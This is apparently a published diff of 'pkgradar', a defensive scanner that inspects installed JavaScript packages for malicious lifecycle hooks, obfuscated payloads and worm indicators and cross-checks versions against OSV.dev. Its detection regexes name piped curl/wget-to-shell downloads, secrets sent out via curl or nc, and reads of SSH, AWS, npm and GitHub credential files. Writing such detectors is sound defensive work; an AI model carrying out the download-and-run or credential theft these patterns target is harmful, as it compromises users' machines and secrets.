const nasty = wf && /\b(curl|wget)\b[^|;&\n]*[|;&]+\s*(ba|z|d)?sh\b|secrets\.[A-Z_]+\b[\s\S]{0,80}(curl|nc |bash -c|http)/.test(wf.text);
|
|
103
|
+
out.push(nasty
|
|
104
|
+
? { sev: SEV.CRITICAL, code: 'malicious-gh-workflow', msg: `bundled GitHub Actions workflow runs a piped shell download / exfiltrates secrets`, evidence: path.relative(pkg.dir, full) }
|
|
105
|
+
: { sev: SEV.INFO, code: 'embedded-gh-workflow', msg: `package ships a GitHub Actions workflow (${e.name})`, evidence: path.relative(pkg.dir, full) });
|
|
106
|
+
}
|
|
107
|
+
}
|
|
108
|
+
}
|
|
109
|
+
return out;
|
|
110
|
+
}
|
|
111
|
+
|
|
112
|
+
// 3. Obfuscated / packed JS payload heuristics on the package's own JS
|
|
113
|
+
function checkObfuscation(pkg) {
|
|
114
|
+
if (!pkg.dir) return [];
|
|
115
|
+
const out = [];
|
|
116
|
+
// Collect candidate JS files, then scan them under a strict per-package budget so a
|
|
117
|
+
// package full of huge vendored bundles (typescript.js, lighthouse bundles, …) can't
|
|
118
|
+
// make a scan run for minutes.
|
|
119
|
+
const files = [];
|
|
120
|
+
const stack = [pkg.dir];
|
|
121
|
+
let dirBudget = 3000;
|
|
122
|
+
while (stack.length && dirBudget-- > 0 && files.length < 200) {
|
|
123
|
+
const d = stack.pop();
|
|
124
|
+
let ents; try { ents = fs.readdirSync(d, { withFileTypes: true }); } catch { continue; }
|
|
125
|
+
for (const e of ents) {
|
|
126
|
+
if (e.name === 'node_modules' || e.name === 'test' || e.name === 'tests' || e.name === '__tests__' || e.name === 'fixtures') continue;
|
|
127
|
+
const full = path.join(d, e.name);
|
|
128
|
+
if (e.isDirectory()) { stack.push(full); continue; }
|
|
129
|
+
if (/\.(c|m)?js$/.test(e.name)) { files.push(full); if (files.length >= 200) break; }
|
|
130
|
+
}
|
|
131
|
+
}
|
|
132
|
+
const PER_FILE = 1_500_000; // scan at most the first 1.5MB of any one file
|
|
133
|
+
const TAIL = 96 * 1024; // ...plus the last 96KB (payloads are often appended)
|
|
134
|
+
let pkgByteBudget = 24_000_000; // ...and at most ~24MB across the whole package
|
|
135
|
+
for (const f of files) {
|
|
136
|
+
if (pkgByteBudget <= 0) break;
|
|
137
|
+
let st; try { st = fs.statSync(f); } catch { continue; }
|
|
138
|
+
let t, truncated = false;
|
|
139
|
+
if (st.size > PER_FILE) {
|
|
140
|
+
truncated = true;
|
|
141
|
+
// big file: scan head + tail only
|
|
142
|
+
let head = '', tail = '';
|
|
143
|
+
try {
|
|
144
|
+
const fd = fs.openSync(f, 'r');
|
|
145
|
+
const hb = Buffer.alloc(Math.min(PER_FILE, st.size)); fs.readSync(fd, hb, 0, hb.length, 0); head = hb.toString('utf8');
|
|
146
|
+
const tb = Buffer.alloc(Math.min(TAIL, st.size)); fs.readSync(fd, tb, 0, tb.length, st.size - tb.length); tail = tb.toString('utf8');
|
|
147
|
+
fs.closeSync(fd);
|
|
148
|
+
} catch { continue; }
|
|
149
|
+
t = head + '\n' + tail;
|
|
150
|
+
pkgByteBudget -= (head.length + tail.length);
|
|
151
|
+
} else {
|
|
152
|
+
const r = readSafe(f, PER_FILE);
|
|
153
|
+
if (!r) continue;
|
|
154
|
+
t = r.text;
|
|
155
|
+
pkgByteBudget -= st.size;
|
|
156
|
+
}
|
|
157
|
+
const strong = []; // each strong reason alone is reportable
|
|
158
|
+
const weak = []; // weak reasons only matter in combination
|
|
159
|
+
let critical = false;
|
|
160
|
+
|
|
161
|
+
// --- hard worm markers: any one => critical ---
|
|
162
|
+
for (const m of WORM_HARD_MARKERS) if (t.includes(m)) { strong.push(`worm IOC string: ${m}`); critical = true; }
|
|
163
|
+
// --- soft worm markers: need >=3 distinct in one file (so a tool's advisory text won't trip it) ---
|
|
164
|
+
const softHits = WORM_SOFT_MARKERS.filter((m) => t.includes(m));
|
|
165
|
+
if (softHits.length >= 3) { strong.push(`co-occurring worm terms: ${softHits.slice(0, 6).join(', ')}`); }
|
|
166
|
+
else if (softHits.length) weak.push(`worm term(s): ${softHits.join(', ')}`);
|
|
167
|
+
|
|
168
|
+
// --- javascript-obfuscator signature ---
|
|
169
|
+
const hexIds = (t.match(/_0x[a-f0-9]{4,6}\b/g) || []).length;
|
|
170
|
+
if (hexIds > 80) strong.push(`${hexIds} _0x… mangled identifiers (javascript-obfuscator)`);
|
|
171
|
+
else if (hexIds > 20) weak.push(`${hexIds} _0x… identifiers`);
|
|
172
|
+
|
|
173
|
+
// --- code building & executing decoded data dynamically ---
|
|
174
|
+
if (/(eval|new Function|Function\()\s*\(?\s*(atob|Buffer\.from\s*\([^)]*base64|unescape|decodeURIComponent)/.test(t)) strong.push('constructs & executes decoded payload (eval/Function over atob/Buffer.from)');
|
|
175
|
+
if (/\bchild_process\b[\s\S]{0,400}\b(atob|Buffer\.from\s*\([^)]*base64)/.test(t)) strong.push('spawns a process from decoded data');
|
|
176
|
+
|
|
177
|
+
// --- weak structural signals (modern bundlers do these constantly) ---
|
|
178
|
+
const longest = t.split('\n').reduce((m, l) => Math.max(m, l.length), 0);
|
|
179
|
+
const minified = longest > 20000;
|
|
180
|
+
if (minified && !/sourceMappingURL/.test(t.slice(-400))) weak.push(`minified (${longest.toLocaleString()}-char line, no sourcemap)`);
|
|
181
|
+
const b64big = (t.match(/['"`][A-Za-z0-9+/]{1200,}={0,2}['"`]/g) || []).length;
|
|
182
|
+
if (b64big) weak.push(`${b64big} large base64 literal(s)`);
|
|
183
|
+
const readsSecret = SECRET_NAMES.some((n) => t.includes(n)) || /['"`][^'"`]*\.npmrc/.test(t) || t.includes('/.ssh/id_') || t.includes('.aws/credentials') || t.includes('.config/gh/hosts');
|
|
184
|
+
const doesNet = /(fetch\s*\(|https?\.(get|request)\s*\(|new XMLHttpRequest|net\.connect|dgram\.)/.test(t)
|
|
185
|
+
&& /https?:\/\/(?!(registry\.npmjs\.org|nodejs\.org|raw\.githubusercontent\.com|api\.github\.com))[\w.-]+/.test(t);
|
|
186
|
+
if (readsSecret) weak.push('references credential file/env names');
|
|
187
|
+
if (doesNet) weak.push('makes an outbound network call to a non-package-registry host');
|
|
188
|
+
|
|
189
|
+
// --- decide ---
|
|
190
|
+
const reasons = [...strong, ...weak];
|
|
191
|
+
let sev = null;
|
|
192
|
+
if (critical) sev = SEV.CRITICAL;
|
|
193
|
+
else if (strong.length) sev = SEV.HIGH;
|
|
194
|
+
else if (readsSecret && doesNet && (minified || b64big || hexIds > 20)) sev = SEV.HIGH; // creds + net + obfuscation
|
|
195
|
+
else if (weak.length >= 3) sev = SEV.MEDIUM;
|
|
196
|
+
// (minified-alone, base64-alone, single weak signal => not reported: too noisy)
|
|
197
|
+
if (sev != null) {
|
|
198
|
+
out.push({ sev, code: 'suspicious-js', msg: reasons.join('; '), evidence: path.relative(pkg.dir, f) + (truncated ? ` (${(st.size / 1e6).toFixed(1)}MB file, scanned head ${(PER_FILE / 1e6).toFixed(1)}MB + tail ${(TAIL / 1024) | 0}KB)` : '') });
|
|
199
|
+
}
|
|
200
|
+
}
|
|
201
|
+
return out;
|
|
202
|
+
}
|
|
203
|
+
|
|
204
|
+
// 4. Manifest oddities (cheap, offline)
|
|
205
|
+
function checkManifestAnomalies(pkg) {
|
|
206
|
+
const out = [];
|
|
207
|
+
const m = pkg.manifest || {};
|
|
208
|
+
// bin pointing outside the package, or to a shell script
|
|
209
|
+
if (m.bin) {
|
|
210
|
+
const bins = typeof m.bin === 'string' ? { [m.name]: m.bin } : m.bin;
|
|
211
|
+
for (const [k, v] of Object.entries(bins)) {
|
|
212
|
+
if (typeof v === 'string' && (v.includes('..') || /\.(sh|bat|cmd|ps1)$/.test(v))) {
|
|
213
|
+
out.push({ sev: SEV.MEDIUM, code: 'odd-bin', msg: `bin "${k}" -> ${v}`, evidence: 'package.json#bin' });
|
|
214
|
+
}
|
|
215
|
+
}
|
|
216
|
+
}
|
|
217
|
+
return out;
|
|
218
|
+
}
|
|
219
|
+
|
|
220
|
+
function runAll(pkg) {
|
|
221
|
+
const findings = [];
|
|
222
|
+
for (const fn of [checkLifecycleHooks, checkWormFiles, checkManifestAnomalies, checkObfuscation]) {
|
|
223
|
+
try { findings.push(...fn(pkg)); } catch (e) { /* ignore per-check failure */ }
|
|
224
|
+
}
|
|
225
|
+
return findings;
|
|
226
|
+
}
|
|
227
|
+
|
|
228
|
+
module.exports = { runAll, SEV };
|
package/lib/osv.js
ADDED
|
@@ -0,0 +1,100 @@
|
|
|
1
|
+
'use strict';
|
|
2
|
+
// Optional online cross-reference against OSV.dev — precise (package, version) matching,
|
|
3
|
+
// no API key. Used only when --online is passed. Two phases:
|
|
4
|
+
// 1. /v1/querybatch — fast: which (name@version) have advisories at all
|
|
5
|
+
// 2. /v1/query — for just those packages, fetch full vuln objects so we can
|
|
6
|
+
// read each advisory's real severity instead of blanket-HIGH.
|
|
7
|
+
const https = require('https');
|
|
8
|
+
|
|
9
|
+
function request(method, host, pathname, body) {
|
|
10
|
+
return new Promise((resolve, reject) => {
|
|
11
|
+
const data = body ? Buffer.from(JSON.stringify(body)) : null;
|
|
12
|
+
const headers = data ? { 'content-type': 'application/json', 'content-length': data.length } : {};
|
|
13
|
+
const req = https.request({ host, path: pathname, method, headers }, (res) => {
|
|
14
|
+
const chunks = [];
|
|
15
|
+
res.on('data', (c) => chunks.push(c));
|
|
16
|
+
res.on('end', () => {
|
|
17
|
+
const txt = Buffer.concat(chunks).toString('utf8');
|
|
18
|
+
if (res.statusCode >= 400) return reject(new Error(`OSV ${res.statusCode} ${pathname}`));
|
|
19
|
+
try { resolve(JSON.parse(txt)); } catch (e) { reject(e); }
|
|
20
|
+
});
|
|
21
|
+
});
|
|
22
|
+
req.on('error', reject);
|
|
23
|
+
req.setTimeout(15000, () => req.destroy(new Error('OSV request timed out')));
|
|
24
|
+
if (data) req.end(data); else req.end();
|
|
25
|
+
});
|
|
26
|
+
}
|
|
27
|
+
|
|
28
|
+
// CVSS v3 vector -> approximate numeric base score is non-trivial; instead bucket by the
|
|
29
|
+
// vector's impact + exploitability shape. Good enough to pick LOW/MEDIUM/HIGH/CRITICAL.
|
|
30
|
+
function bucketFromCvssVector(vec) {
|
|
31
|
+
if (!vec || typeof vec !== 'string') return null;
|
|
32
|
+
const m = Object.fromEntries(vec.split('/').map((p) => p.split(':')).filter((a) => a.length === 2));
|
|
33
|
+
const impactHigh = ['C', 'I', 'A'].filter((k) => m[k] === 'H').length;
|
|
34
|
+
const network = m.AV === 'N';
|
|
35
|
+
const noPriv = m.PR === 'N' || m.PR === undefined;
|
|
36
|
+
const noUI = m.UI === 'N' || m.UI === undefined;
|
|
37
|
+
if (impactHigh >= 2 && network && noPriv && noUI) return 'CRITICAL';
|
|
38
|
+
if (impactHigh >= 1 && network && noPriv) return 'HIGH';
|
|
39
|
+
if (impactHigh >= 1) return 'MEDIUM';
|
|
40
|
+
return 'LOW';
|
|
41
|
+
}
|
|
42
|
+
|
|
43
|
+
function severityOfVuln(v) {
|
|
44
|
+
const ds = v.database_specific && (v.database_specific.severity || v.database_specific.cvss);
|
|
45
|
+
if (typeof ds === 'string') {
|
|
46
|
+
const s = ds.toUpperCase();
|
|
47
|
+
if (s.startsWith('CRIT')) return 'CRITICAL';
|
|
48
|
+
if (s === 'HIGH') return 'HIGH';
|
|
49
|
+
if (s === 'MODERATE' || s === 'MEDIUM') return 'MEDIUM';
|
|
50
|
+
if (s === 'LOW') return 'LOW';
|
|
51
|
+
}
|
|
52
|
+
for (const s of v.severity || []) {
|
|
53
|
+
if (typeof s.score === 'string') {
|
|
54
|
+
const num = parseFloat(s.score);
|
|
55
|
+
if (!Number.isNaN(num) && /^\d/.test(s.score.trim())) {
|
|
56
|
+
if (num >= 9) return 'CRITICAL';
|
|
57
|
+
if (num >= 7) return 'HIGH';
|
|
58
|
+
if (num >= 4) return 'MEDIUM';
|
|
59
|
+
return 'LOW';
|
|
60
|
+
}
|
|
61
|
+
const b = bucketFromCvssVector(s.score);
|
|
62
|
+
if (b) return b;
|
|
63
|
+
}
|
|
64
|
+
}
|
|
65
|
+
return 'MEDIUM'; // unknown -> don't over- or under-claim
|
|
66
|
+
}
|
|
67
|
+
|
|
68
|
+
// pkgs: [{name, version}]. Returns Map "name@version" -> [{ id, severity, summary }]
|
|
69
|
+
async function queryOSV(pkgs) {
|
|
70
|
+
const uniq = new Map();
|
|
71
|
+
for (const p of pkgs) if (p.name && p.version) uniq.set(`${p.name}@${p.version}`, p);
|
|
72
|
+
const entries = [...uniq.values()];
|
|
73
|
+
|
|
74
|
+
// phase 1: which entries have anything
|
|
75
|
+
const affected = [];
|
|
76
|
+
for (let i = 0; i < entries.length; i += 900) {
|
|
77
|
+
const batch = entries.slice(i, i + 900);
|
|
78
|
+
const resp = await request('POST', 'api.osv.dev', '/v1/querybatch', {
|
|
79
|
+
queries: batch.map((p) => ({ package: { ecosystem: 'npm', name: p.name }, version: p.version })),
|
|
80
|
+
});
|
|
81
|
+
(resp.results || []).forEach((r, idx) => { if ((r.vulns || []).length) affected.push(batch[idx]); });
|
|
82
|
+
}
|
|
83
|
+
|
|
84
|
+
// phase 2: full details for affected packages only (bounded concurrency)
|
|
85
|
+
const result = new Map();
|
|
86
|
+
const queue = affected.slice();
|
|
87
|
+
const worker = async () => {
|
|
88
|
+
for (let p; (p = queue.shift()); ) {
|
|
89
|
+
try {
|
|
90
|
+
const resp = await request('POST', 'api.osv.dev', '/v1/query', { package: { ecosystem: 'npm', name: p.name }, version: p.version });
|
|
91
|
+
const vulns = (resp.vulns || []).map((v) => ({ id: v.id, severity: severityOfVuln(v), summary: v.summary || '' }));
|
|
92
|
+
if (vulns.length) result.set(`${p.name}@${p.version}`, vulns);
|
|
93
|
+
} catch { /* skip this one */ }
|
|
94
|
+
}
|
|
95
|
+
};
|
|
96
|
+
await Promise.all(Array.from({ length: Math.min(8, queue.length) }, worker));
|
|
97
|
+
return result;
|
|
98
|
+
}
|
|
99
|
+
|
|
100
|
+
module.exports = { queryOSV };
|
package/lib/scan.js
ADDED
|
@@ -0,0 +1,86 @@
|
|
|
1
|
+
'use strict';
|
|
2
|
+
const { discoverStores, packagesInStore } = require('./stores');
|
|
3
|
+
const { runAll, SEV } = require('./checks');
|
|
4
|
+
const { queryOSV } = require('./osv');
|
|
5
|
+
|
|
6
|
+
const SEV_NAME = { 4: 'CRITICAL', 3: 'HIGH', 2: 'MEDIUM', 1: 'LOW', 0: 'INFO' };
|
|
7
|
+
|
|
8
|
+
let ALLOW_EXACT = new Set(), ALLOW_SCOPES = [];
|
|
9
|
+
try {
|
|
10
|
+
const a = require('../data/allowlist.json');
|
|
11
|
+
for (const n of a.names || []) { if (n.endsWith('/*')) ALLOW_SCOPES.push(n.slice(0, -1)); else ALLOW_EXACT.add(n); }
|
|
12
|
+
} catch { /* allowlist optional */ }
|
|
13
|
+
function isAllowlisted(name) {
|
|
14
|
+
if (ALLOW_EXACT.has(name)) return true;
|
|
15
|
+
return ALLOW_SCOPES.some((s) => name.startsWith(s));
|
|
16
|
+
}
|
|
17
|
+
|
|
18
|
+
async function scan(opts = {}) {
|
|
19
|
+
const cwd = opts.cwd || process.cwd();
|
|
20
|
+
const stores = discoverStores(cwd);
|
|
21
|
+
const kindFilter = Array.isArray(opts.stores) && opts.stores.length ? new Set(opts.stores) : null;
|
|
22
|
+
const storeStats = [];
|
|
23
|
+
const seen = new Map(); // "name@version@dir" -> pkg (dedupe)
|
|
24
|
+
const findings = [];
|
|
25
|
+
const allPkgList = [];
|
|
26
|
+
|
|
27
|
+
for (const store of stores) {
|
|
28
|
+
if (kindFilter && !kindFilter.has(store.kind)) continue;
|
|
29
|
+
let count = 0;
|
|
30
|
+
for (const pkg of packagesInStore(store, { maxDepth: opts.maxDepth })) {
|
|
31
|
+
count++;
|
|
32
|
+
const key = `${pkg.name}@${pkg.version}@${pkg.dir || store.root}`;
|
|
33
|
+
if (seen.has(key)) continue;
|
|
34
|
+
seen.set(key, pkg);
|
|
35
|
+
allPkgList.push({ name: pkg.name, version: pkg.version });
|
|
36
|
+
if (pkg.archiveOnly) continue; // can't inspect bytes inside a yarn-berry zip
|
|
37
|
+
const allow = !opts.noAllowlist && isAllowlisted(pkg.name);
|
|
38
|
+
for (const f of runAll(pkg)) {
|
|
39
|
+
let sev = f.sev, note;
|
|
40
|
+
// allowlist downgrades benign-looking findings — but NEVER suppresses a hard worm
|
|
41
|
+
// IOC (worm-ioc-file / CRITICAL suspicious-js), since that's the compromise case.
|
|
42
|
+
if (allow && sev < SEV.CRITICAL) { sev = SEV.INFO; note = 'allowlisted package, heuristic likely benign; review only if context warrants'; }
|
|
43
|
+
if (sev < (opts.minSev ?? SEV.MEDIUM)) continue;
|
|
44
|
+
findings.push({
|
|
45
|
+
severity: SEV_NAME[sev], sevNum: sev, code: f.code, message: f.msg, evidence: f.evidence,
|
|
46
|
+
package: pkg.name, version: pkg.version, store: store.kind, dir: pkg.dir, note,
|
|
47
|
+
});
|
|
48
|
+
}
|
|
49
|
+
}
|
|
50
|
+
storeStats.push({ kind: store.kind, root: store.root, note: store.note, packages: count });
|
|
51
|
+
}
|
|
52
|
+
|
|
53
|
+
let osv = null;
|
|
54
|
+
if (opts.online) {
|
|
55
|
+
try {
|
|
56
|
+
const map = await queryOSV(allPkgList);
|
|
57
|
+
osv = [];
|
|
58
|
+
const SEV_RANK = { CRITICAL: SEV.CRITICAL, HIGH: SEV.HIGH, MEDIUM: SEV.MEDIUM, LOW: SEV.LOW };
|
|
59
|
+
for (const [nv, vulns] of map) {
|
|
60
|
+
const [name, version] = splitNV(nv);
|
|
61
|
+
const top = vulns.reduce((m, v) => Math.max(m, SEV_RANK[v.severity] ?? SEV.MEDIUM), SEV.LOW);
|
|
62
|
+
const bySev = {};
|
|
63
|
+
for (const v of vulns) bySev[v.severity] = (bySev[v.severity] || 0) + 1;
|
|
64
|
+
const breakdown = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW'].filter((k) => bySev[k]).map((k) => `${bySev[k]} ${k.toLowerCase()}`).join(', ');
|
|
65
|
+
const ids = vulns.map((v) => v.id);
|
|
66
|
+
findings.push({
|
|
67
|
+
severity: SEV_NAME[top], sevNum: top, code: 'osv-advisory',
|
|
68
|
+
message: `${vulns.length} OSV ${vulns.length === 1 ? 'advisory' : 'advisories'} (${breakdown}): ${ids.slice(0, 8).join(', ')}${ids.length > 8 ? ', …' : ''}`,
|
|
69
|
+
evidence: 'https://osv.dev/' + ids.find((id) => vulns.find((v) => v.id === id && SEV_RANK[v.severity] === top)),
|
|
70
|
+
package: name, version, store: 'registry', dir: null,
|
|
71
|
+
});
|
|
72
|
+
osv.push({ package: name, version, advisories: vulns });
|
|
73
|
+
}
|
|
74
|
+
} catch (e) {
|
|
75
|
+
osv = { error: e.message };
|
|
76
|
+
}
|
|
77
|
+
}
|
|
78
|
+
|
|
79
|
+
findings.sort((a, b) => b.sevNum - a.sevNum || a.package.localeCompare(b.package));
|
|
80
|
+
const totalPackages = [...new Set(allPkgList.map((p) => `${p.name}@${p.version}`))].length;
|
|
81
|
+
return { cwd, stores: storeStats, totalPackages, totalScanned: seen.size, findings, osv };
|
|
82
|
+
}
|
|
83
|
+
|
|
84
|
+
function splitNV(nv) { const i = nv.lastIndexOf('@'); return [nv.slice(0, i), nv.slice(i + 1)]; }
|
|
85
|
+
|
|
86
|
+
module.exports = { scan, SEV };
|
package/lib/stores.js
ADDED
|
@@ -0,0 +1,96 @@
|
|
|
1
|
+
'use strict';
|
|
2
|
+
// Discover every place a JS package manager leaves extracted package code, and
|
|
3
|
+
// iterate the packages found there.
|
|
4
|
+
const fs = require('fs');
|
|
5
|
+
const path = require('path');
|
|
6
|
+
const os = require('os');
|
|
7
|
+
const cp = require('child_process');
|
|
8
|
+
|
|
9
|
+
const exists = (p) => { try { fs.accessSync(p); return true; } catch { return false; } };
|
|
10
|
+
const readdir = (p) => { try { return fs.readdirSync(p, { withFileTypes: true }); } catch { return []; } };
|
|
11
|
+
const sh = (cmd) => { try { return cp.execSync(cmd, { stdio: ['ignore', 'pipe', 'ignore'] }).toString().trim(); } catch { return ''; } };
|
|
12
|
+
|
|
13
|
+
function discoverStores(cwd) {
|
|
14
|
+
const home = os.homedir();
|
|
15
|
+
const out = [];
|
|
16
|
+
const add = (kind, root, note) => { if (exists(root)) out.push({ kind, root, note }); };
|
|
17
|
+
|
|
18
|
+
add('project', path.join(cwd, 'node_modules'), 'current project node_modules');
|
|
19
|
+
add('pnpm-project', path.join(cwd, 'node_modules', '.pnpm'), 'pnpm in-project store');
|
|
20
|
+
const g = sh('npm root -g'); if (g) add('npm-global', g, 'npm global packages');
|
|
21
|
+
add('npx-cache', path.join(home, '.npm', '_npx'), 'npx ephemeral installs');
|
|
22
|
+
add('bun-cache', path.join(home, '.bun', 'install', 'cache'), 'bun global cache');
|
|
23
|
+
add('bun-cache', path.join(home, '.cache', 'bun', 'install', 'cache'), 'bun cache (xdg)');
|
|
24
|
+
for (const p of [
|
|
25
|
+
path.join(home, 'Library', 'pnpm', 'store'),
|
|
26
|
+
path.join(home, '.local', 'share', 'pnpm', 'store'),
|
|
27
|
+
process.env.PNPM_HOME && path.join(process.env.PNPM_HOME, 'store'),
|
|
28
|
+
].filter(Boolean)) add('pnpm-store', p, 'pnpm global content store (count only)');
|
|
29
|
+
const yc = sh('yarn cache dir'); if (yc) add('yarn-cache', yc, 'yarn v1 cache');
|
|
30
|
+
add('yarn-berry', path.join(cwd, '.yarn', 'cache'), 'yarn berry zip cache (names only)');
|
|
31
|
+
return out;
|
|
32
|
+
}
|
|
33
|
+
|
|
34
|
+
function readManifest(dir) {
|
|
35
|
+
try { return JSON.parse(fs.readFileSync(path.join(dir, 'package.json'), 'utf8')); } catch { return null; }
|
|
36
|
+
}
|
|
37
|
+
function pkgFromDir(dir, store) {
|
|
38
|
+
const m = readManifest(dir);
|
|
39
|
+
if (!m) return null;
|
|
40
|
+
return { name: m.name || path.basename(dir), version: m.version || '', dir, store, manifest: m };
|
|
41
|
+
}
|
|
42
|
+
|
|
43
|
+
function* walkTree(nmDir, store, maxDepth, depth = 0) {
|
|
44
|
+
if (depth > maxDepth || !exists(nmDir)) return;
|
|
45
|
+
for (const ent of readdir(nmDir)) {
|
|
46
|
+
if (ent.name.startsWith('.')) continue;
|
|
47
|
+
const full = path.join(nmDir, ent.name);
|
|
48
|
+
if (ent.name.startsWith('@')) {
|
|
49
|
+
for (const sub of readdir(full)) {
|
|
50
|
+
const d = path.join(full, sub.name);
|
|
51
|
+
const p = pkgFromDir(d, store); if (p) yield p;
|
|
52
|
+
yield* walkTree(path.join(d, 'node_modules'), store, maxDepth, depth + 1);
|
|
53
|
+
}
|
|
54
|
+
} else {
|
|
55
|
+
const p = pkgFromDir(full, store); if (p) yield p;
|
|
56
|
+
yield* walkTree(path.join(full, 'node_modules'), store, maxDepth, depth + 1);
|
|
57
|
+
}
|
|
58
|
+
}
|
|
59
|
+
}
|
|
60
|
+
|
|
61
|
+
function* packagesInStore(store, opts = {}) {
|
|
62
|
+
const maxDepth = opts.maxDepth || 12;
|
|
63
|
+
switch (store.kind) {
|
|
64
|
+
case 'bun-cache': {
|
|
65
|
+
for (const ent of readdir(store.root)) {
|
|
66
|
+
if (!ent.isDirectory() || ent.name === '.bin' || ent.name === '.cache') continue;
|
|
67
|
+
const full = path.join(store.root, ent.name);
|
|
68
|
+
if (ent.name.startsWith('@')) {
|
|
69
|
+
for (const sub of readdir(full)) if (sub.isDirectory()) { const p = pkgFromDir(path.join(full, sub.name), store); if (p) yield p; }
|
|
70
|
+
} else { const p = pkgFromDir(full, store); if (p) yield p; }
|
|
71
|
+
}
|
|
72
|
+
return;
|
|
73
|
+
}
|
|
74
|
+
case 'yarn-berry': {
|
|
75
|
+
for (const ent of readdir(store.root)) {
|
|
76
|
+
if (ent.isFile() && ent.name.endsWith('.zip')) {
|
|
77
|
+
const m = ent.name.match(/^(.*)-npm-(.+)-[a-f0-9]{8,}\.zip$/);
|
|
78
|
+
if (m) yield { name: m[1].replace(/^@([^-]+)-/, '@$1/'), version: m[2], dir: null, store, archiveOnly: true };
|
|
79
|
+
}
|
|
80
|
+
}
|
|
81
|
+
return;
|
|
82
|
+
}
|
|
83
|
+
case 'pnpm-store': return; // content-addressed blobs; not extracted trees
|
|
84
|
+
case 'npx-cache':
|
|
85
|
+
case 'pnpm-project': {
|
|
86
|
+
for (const ent of readdir(store.root)) {
|
|
87
|
+
if (ent.isDirectory()) yield* walkTree(path.join(store.root, ent.name, 'node_modules'), store, maxDepth);
|
|
88
|
+
}
|
|
89
|
+
return;
|
|
90
|
+
}
|
|
91
|
+
default: // project, npm-global, yarn-cache
|
|
92
|
+
yield* walkTree(store.root, store, maxDepth);
|
|
93
|
+
}
|
|
94
|
+
}
|
|
95
|
+
|
|
96
|
+
module.exports = { discoverStores, packagesInStore, exists, readdir };
|
package/package.json
ADDED
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "pkgradar",
|
|
3
|
+
"version": "0.1.0",
|
|
4
|
+
"description": "Content-based supply-chain scanner for npm/pnpm/yarn/bun: inspects the bytes you actually installed (lifecycle hooks, obfuscated payloads, worm IOCs) instead of just matching package names against an advisory list.",
|
|
5
|
+
"bin": {
|
|
6
|
+
"pkgradar": "bin/pkgradar.js"
|
|
7
|
+
},
|
|
8
|
+
"type": "commonjs",
|
|
9
|
+
"files": [
|
|
10
|
+
"bin/",
|
|
11
|
+
"lib/",
|
|
12
|
+
"data/",
|
|
13
|
+
"README.md"
|
|
14
|
+
],
|
|
15
|
+
"engines": {
|
|
16
|
+
"node": ">=18"
|
|
17
|
+
},
|
|
18
|
+
"repository": {
|
|
19
|
+
"type": "git",
|
|
20
|
+
"url": "git+https://github.com/nilaydown/pkgradar.git"
|
|
21
|
+
},
|
|
22
|
+
"homepage": "https://github.com/nilaydown/pkgradar#readme",
|
|
23
|
+
"bugs": {
|
|
24
|
+
"url": "https://github.com/nilaydown/pkgradar/issues"
|
|
25
|
+
},
|
|
26
|
+
"author": "nilaydown",
|
|
27
|
+
"scripts": {
|
|
28
|
+
"test": "node test/smoke.js"
|
|
29
|
+
},
|
|
30
|
+
"keywords": [
|
|
31
|
+
"supply-chain",
|
|
32
|
+
"security",
|
|
33
|
+
"npm",
|
|
34
|
+
"pnpm",
|
|
35
|
+
"yarn",
|
|
36
|
+
"bun",
|
|
37
|
+
"malware",
|
|
38
|
+
"shai-hulud",
|
|
39
|
+
"audit",
|
|
40
|
+
"scanner"
|
|
41
|
+
],
|
|
42
|
+
"license": "MIT",
|
|
43
|
+
"dependencies": {}
|
|
44
|
+
}
|